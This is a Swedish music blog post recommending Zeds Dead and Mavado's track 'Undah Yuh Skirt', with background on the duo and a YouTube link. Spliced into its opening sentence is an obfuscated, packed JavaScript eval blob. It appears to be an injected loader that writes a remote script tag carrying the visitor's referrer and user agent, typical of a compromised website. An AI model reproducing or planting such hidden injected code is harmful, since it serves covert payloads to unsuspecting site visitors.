Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Söndagsröj: Zeds Dead feat. Mavado – Undah Yuh Skirt

Söndagsröj: Zeds Dead feat. Mavado – Undah Yuh Skirt
Alexander Gylemo

Japp, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abtyz|var|u0026u|referrer|benes||js|php’.split(’|’),0,{}))
helgen är inte över än! Än kan vi njuta av riktigt spårad musik, se tillbaks på en riktigt soft helg och hylla de genuina artisterna!

Här har vi en inte helt splitterny låt från nya favoriterna Zeds Dead. Duon Zeds Dead kommer från Toronto och har varit igång sedan 2009 då de tillsammans med The Killabits startade klubbkonceptet Bassmentality. Tillsammans hoppar de mellan genrerna och har än så länge leverat hits som ”In the Beginning”, ”Rudeboy”, ”Rumble in the Jungle” och ”Adrenaline”.  Bortsett från att de själva är grymma djs fick de till Bassmentality in gäster som Doctor P, Skrillex, Nero, Netsky, Borgore, Mary Ann Hobbs, 12th Planet och Toddla T för att bara nämna några. Med musiken de producerar och spelar och gästerna de fick in var det knappast en slump att de snabbt dök upp på EDM-radarn och genom sina skills har de sett till att hålla sig kvar.

”Undah Your Skirt” är en av deras kändaste låtar, vi bjuds på klassikerblenden drum ’n’n bass och dubstep i en fruktansvärt välproducerad låt fylld med grymma rytmer och övergångar, brutala syntar och en perfekt vocal levererad från Mavado. För de som fortfarande håller fanan högt skänker jag en extra hälsning. Lyssna och njut!

httpv://www.youtube.com/watch?v=L96NJiul7uQ